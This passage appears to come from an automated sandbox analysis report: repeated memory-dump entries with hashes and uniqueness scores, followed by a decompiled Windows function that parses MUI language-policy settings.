                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00A68788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E00A68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E00A4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E00A6718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E00A68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E00A6718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E00A68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E00A68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E00A68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E00A6718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E00A42340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E00A5E679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E00A4E2A8(_t322,  &_v68, _v16);
                                                								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E00A5E679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E00A4E2A8(_t322,  &_v68, _t236);
                                                								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
